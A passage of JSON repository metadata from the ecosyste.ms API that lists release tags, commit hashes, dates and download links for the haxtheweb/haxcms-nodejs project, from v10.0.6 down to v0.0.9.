.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.6/manifests"},{"name":"v10.0.5","sha":"a1c282befde7c21e5630c84f54defb5abed97dc9","kind":"tag","published_at":"2025-04-03T18:18:23.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v10.0.5","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v10.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v10.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.5/manifests"},{"name":"v10.0.4","sha":"5da5f3247da9eb9385564496dca05052b8068c79","kind":"tag","published_at":"2025-03-07T19:07:29.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v10.0.4","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v10.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v10.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.4/manifests"},{"name":"v10.0.3","sha":"58fc82bc500b697ee16676218cb2a5a01d9b4ac1","kind":"tag","published_at":"2025-02-24T20:52:38.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v10.0.3","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v10.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v10.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.3/manifests"},{"name":"v10.0.2","sha":"d4bb472489212fa72f45e492bfb774ba2708c349","kind":"tag","published_at":"2025-01-31T20:25:46.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v10.0.2","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"33ba8172483d04669a70b31924ed53b29ebbd35b","kind":"tag","published_at":"2024-12-20T20:00:03.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v10.0.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v10.0.1/manifests"},{"name":"10.0.0","sha":"c13f4e217e0bc95903dc682a79dae973edd8ae73","kind":"commit","published_at":"2024-12-20T19:34:28.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/10.0.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/10.0.0/manifests"},{"name":"v9.0.21","sha":"a2f8726211ebec21611a38bededf9a0aaff914cb","kind":"tag","published_at":"2024-12-17T19:57:58.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.21","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.21/manifests"},{"name":"v9.0.20","sha":"4d4b5f6528e8945444d1351c67b180bcabc7fe6e","kind":"tag","published_at":"2024-11-26T19:44:20.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.20","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.20/manifests"},{"name":"v9.0.19","sha":"d85cd3bd1ceb7347f7008b2857d22ae898bc81ee","kind":"tag","published_at":"2024-11-26T19:34:27.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.19","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.19/manifests"},{"name":"v9.0.18","sha":"6653259fd2a96f98d715db202aeda6c599596571","kind":"tag","published_at":"2024-11-18T20:31:57.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.18","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.18/manifests"},{"name":"v9.0.17","sha":"edb04ac4959815e0647317608adfc487765bbffb","kind":"tag","published_at":"2024-11-15T20:49:28.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.17","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.17/manifests"},{"name":"v9.0.16","sha":"ea3cf05b2c17e08e835ec33db0accfaf4714a84c","kind":"tag","published_at":"2024-11-15T20:11:48.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.16","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.16/manifests"},{"name":"v9.0.15","sha":"e15f456e36a157333ae8d492fa621c5249c4fe15","kind":"tag","published_at":"2024-10-29T20:37:08.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.15","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.15/manifests"},{"name":"v9.0.14","sha":"00617a59d926bd6ca4ba65f394881c60d45e4181","kind":"tag","published_at":"2024-10-24T21:21:50.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.14","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.14/manifests"},{"name":"v9.0.13","sha":"21d1f54c4e01c609bd53fc73b8e8018645bbd319","kind":"tag","published_at":"2024-10-23T20:33:01.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.13","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.13/manifests"},{"name":"v9.0.12","sha":"fd492bdeb8e6b0678f64f2b8751c0612d965c462","kind":"tag","published_at":"2024-10-21T19:45:58.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.12","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.12/manifests"},{"name":"v9.0.11","sha":"585f8368e8dde2e3a67ba8bdac209081744b3606","kind":"tag","published_at":"2024-10-07T18:37:58.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.11","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.11/manifests"},{"name":"v9.0.10","sha":"b77661ad772fbeba6d5d67b9ed4d1fca2ba81e27","kind":"tag","published_at":"2024-10-07T18:25:50.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.10","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.10/manifests"},{"name":"v9.0.9","sha":"e5b3cd2db7aa8766b0e3626a8f9b95966f51783d","kind":"tag","published_at":"2024-10-07T18:10:48.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.9","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.9/manifests"},{"name":"v9.0.8","sha":"10e8093214b6e01ec938ebdf5d0164ce5d4723e1","kind":"tag","published_at":"2024-10-04T01:38:00.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.8","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.8/manifests"},{"name":"v9.0.7","sha":"edc154dc36bfa08838a3797d2a95bd30f4edf984","kind":"tag","published_at":"2024-09-25T20:06:47.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.7","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.7/manifests"},{"name":"v9.0.6","sha":"be9dd126c3ad79770ba16fe788fc8cebb43837d5","kind":"tag","published_at":"2024-08-22T20:19:34.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.6","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.6/manifests"},{"name":"v9.0.5","sha":"756862bc89ca622b170dd00563c07eca62276289","kind":"tag","published_at":"2024-08-03T02:59:06.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.5","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.5/manifests"},{"name":"v9.0.4","sha":"a927278ea217ea4238e4f12b98006cec306832f1","kind":"tag","published_at":"2024-08-03T01:34:15.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.4","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.4/manifests"},{"name":"v9.0.3","sha":"d82205c73fce5a612e8082d71904cc07764c2a62","kind":"tag","published_at":"2024-07-30T19:36:39.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.3","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.3/manifests"},{"name":"v9.0.2","sha":"c32d134f8aad05eafe7ce4a31f007f108c8119aa","kind":"tag","published_at":"2024-07-24T21:31:04.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.2","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.2/manifests"},{"name":"v9.0.1","sha":"46c00356a48898cd27f7bd33574af984bdd7799e","kind":"tag","published_at":"2024-07-22T19:42:06.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.1/manifests"},{"name":"v9.0.0","sha":"89f1c4898797b797ff78dbf7f948eaf3054c3512","kind":"tag","published_at":"2024-07-12T21:25:59.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.0/manifests"},{"name":"v9.0.0-alpha.1","sha":"5d80253e97a364dc3b4ef3c9d47790672ad45aef","kind":"tag","published_at":"2024-06-28T20:53:21.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.0-alpha.1","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.0-alpha.1/manifests"},{"name":"v9.0.0-alpha.0","sha":"5b7346a3ab833ebfc0e08012e7893a5757a551f5","kind":"tag","published_at":"2024-06-28T20:53:11.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v9.0.0-alpha.0","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v9.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v9.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v9.0.0-alpha.0/manifests"},{"name":"v0.0.19","sha":"e0377529ef763f4c4a86f0e8ba9d7147023a85ad","kind":"tag","published_at":"2024-06-28T20:51:54.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.19","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.19/manifests"},{"name":"v0.0.18","sha":"a098291d809cc8d8eb09b8ae7261ef265beab2f4","kind":"tag","published_at":"2024-06-28T20:51:21.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.18","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.18/manifests"},{"name":"v0.0.17","sha":"8380232ef5e17e70bb6e7f6ddf25e59ee2f4ccc7","kind":"tag","published_at":"2024-06-28T20:50:15.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.17","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.17/manifests"},{"name":"v0.0.16","sha":"6d48a5b98c15b91d0e19b50657f740dcd4c5ff0c","kind":"tag","published_at":"2024-06-28T20:43:14.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.16","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.16/manifests"},{"name":"v0.0.15","sha":"89d2ac495b182e2dbbf96aaad8766e87fdd54f10","kind":"tag","published_at":"2024-06-24T21:05:22.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.15","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.15/manifests"},{"name":"v0.0.14","sha":"d5ffb0a2b2c972fe37bfff9362cb8e00f03dc0e2","kind":"tag","published_at":"2024-06-21T21:08:16.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.14","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.14/manifests"},{"name":"v0.0.13","sha":"0dd526b3c2b6215cc7f3d16b08e251e75c3e00aa","kind":"tag","published_at":"2024-06-21T21:03:15.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.13","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.13/manifests"},{"name":"v0.0.12","sha":"ae1c8d6aea6f316eda2be711050b2333e793f2c2","kind":"tag","published_at":"2024-06-20T20:47:38.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.12","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.12/manifests"},{"name":"v0.0.11","sha":"eb312fac77737a0ec7cb6b24681c3b1e41cbb158","kind":"tag","published_at":"2024-06-20T20:17:57.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.11","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.11/manifests"},{"name":"v0.0.10","sha":"1551412b33157f202963a9e9ef473b232899fe55","kind":"tag","published_at":"2024-06-20T19:17:37.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.10","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.10/manifests"},{"name":"v0.0.9","sha":"175c075ffdc92dd6ca538c45731d8ab130b1f853","kind":"tag","published_at":"2024-06-18T20:37:58.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.9","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nod